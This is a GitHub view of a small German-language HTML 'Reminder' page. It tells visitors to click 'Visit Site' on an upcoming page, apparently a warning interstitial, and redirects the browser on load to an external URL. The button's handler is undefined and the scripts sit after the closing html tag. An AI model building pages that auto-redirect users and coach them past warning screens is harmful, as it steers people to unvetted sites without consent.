-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
36 lines (31 loc) · 1.09 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Reminder</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<style>
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background-color: #00ffea;
}
.img {
border-radius: 15px;
}
</style>
</head>
<body align="center">
<h1>Die nachfolgende Seite wird so aussehen:</h1>
<img src="next_site.png" class="img" width="1200" height="500">
<h1>Sie müssen einfach nur auf ,,Visit Site'' klicken.</h1>
<button class="btn btn-primary" onclick="conti();">Weiter -></button>
</body>
</html>
<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
<!-- Latest compiled JavaScript -->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<script>
window.location.href = 'https://artim-industries.com/redirect/?additions=k:default%7Ca:f,hotlink/';
</script>